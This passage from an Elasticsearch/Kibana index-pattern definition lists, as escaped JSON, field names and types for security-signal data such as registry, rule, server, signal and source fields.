ypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}